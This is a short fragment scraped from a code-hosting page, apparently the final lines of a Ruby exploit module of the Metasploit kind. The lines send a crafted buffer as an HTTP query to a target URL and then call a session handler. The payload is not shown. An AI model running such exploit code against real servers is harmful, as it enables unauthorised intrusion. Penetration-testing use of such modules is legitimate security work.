||||
r = send_request_raw({
|
||||
'uri' => datastore['URL'],
|
||||
'query' => buf
|
||||
}, 5)
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue